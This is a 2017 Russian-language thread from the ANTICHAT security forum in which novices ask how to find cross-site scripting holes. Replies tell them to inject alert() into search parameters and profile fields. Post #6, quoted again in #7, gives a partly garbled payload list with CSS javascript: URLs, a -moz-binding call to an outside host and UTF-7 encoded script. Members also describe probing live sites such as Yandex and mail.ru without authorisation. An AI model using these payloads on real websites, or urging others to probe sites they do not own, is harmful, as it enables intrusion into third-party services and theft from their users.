HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.09.2017, 00:39
hells_bells
Новичок
Регистрация: 06.09.2017
Сообщений: 1
Провел на форуме:
310

Репутация: 0
По умолчанию

Приветствую в моей первой теме!

Если быть кратким, то меня интересует парочка вопросов касательно XSS уязвимости:

- Видел на форуме много тем о XSS, но большинство из них были открыты очень давно(по меркам Web`а), как вы считаете - является ли XSS уязвимость актуальной и по сей день или нет?

- Если же XSS актуальна, можете ли вы поделиться своим опытом поиска уязвимых сайтов?(поверьте, прежде чем задавать этот вопрос сюда, сам перелопатил кучу гору сайтов - безуспешно)
 
Ответить с цитированием

  #2  
Старый 07.09.2017, 00:59
{iddqd}
Участник форума
Регистрация: 22.12.2011
Сообщений: 170
Провел на форуме:
46938

Репутация: 2
По умолчанию

Конечно! таких сайтов дохуя!

Ищи на сайтах формы для ввода каких-то данных и потом ищи их отображение на странице. Лезь в исходный код страницы и ищи как в html выводятся введенные тобой данные.

Если говорить о пассивных xss, то в адресной строке браузера должно быть нечто вроде http://site.com/?search="..."

в качестве параметра подставляй

Код:
alert()
или сначала тег закрывай "/> а потом алерт()

Active XSS часто встречаются на сайтах, где есть регистрация и личный кабинет. В разные поля можно подставлять алерт, некоторые поля могут выводиться без фильтрации.
 
Ответить с цитированием

  #3  
Старый 07.09.2017, 17:45
tester211
Новичок
Регистрация: 29.08.2017
Сообщений: 2
Провел на форуме:
510

Репутация: 0
По умолчанию

Это наверное самая интересная штука, которая позволяет что то воровать
 
Ответить с цитированием

  #4  
Старый 26.09.2017, 18:45
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

Где-то слышал что сейчас браузеры лочат ХХС
 
Ответить с цитированием

  #5  
Старый 26.09.2017, 22:47
Logol
Новичок
Регистрация: 29.10.2016
Сообщений: 17
Провел на форуме:
3742

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  

Где-то слышал что сейчас браузеры лочат ХХС
они не могу его блочить так как для выполнения xss нужен js А БЕЗ сайты не работают)
 
Ответить с цитированием

  #6  
Старый 26.09.2017, 22:49
Logol
Новичок
Регистрация: 29.10.2016
Сообщений: 17
Провел на форуме:
3742

Репутация: 0
По умолчанию

мой маленький набор

Код:
'';!--"=&{()}

xxs link

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

xxs link
alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

cript:alert('XSS')">

cript:alert('XSS')">

alert("XSS")'); ?>
alert('XSS')">
 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
 
Ответить с цитированием

  #7  
Старый 13.10.2017, 20:15
StarkMP
Новичок
Регистрация: 13.10.2017
Сообщений: 2
Провел на форуме:
664

Репутация: 0
По умолчанию

Цитата:
Сообщение от Logol  

мой маленький набор
Код:
'';!--"=&{()}

xxs link

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

xxs link
alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

cript:alert('XSS')">

cript:alert('XSS')">

alert("XSS")'); ?>
alert('XSS')">
 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
 
Ответить с цитированием

  #8  
Старый 13.10.2017, 20:44
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от StarkMP  

Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
Да, хотя вектора можно ещё придумать
 
Ответить с цитированием

  #9  
Старый 13.10.2017, 20:46
StarkMP
Новичок
Регистрация: 13.10.2017
Сообщений: 2
Провел на форуме:
664

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  

Да, хотя вектора можно ещё придумать
Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
 
Ответить с цитированием

  #10  
Старый 13.10.2017, 21:32
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от StarkMP  

Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
Возможно, на mail.ru раньше было много, но эксплуатировать сложновато стало, браузеры блочат, надо искать новые вектора и обходы.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.